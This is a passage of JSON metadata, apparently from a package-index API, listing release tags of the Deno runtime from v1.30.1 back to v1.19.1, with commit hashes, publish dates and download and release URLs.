bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1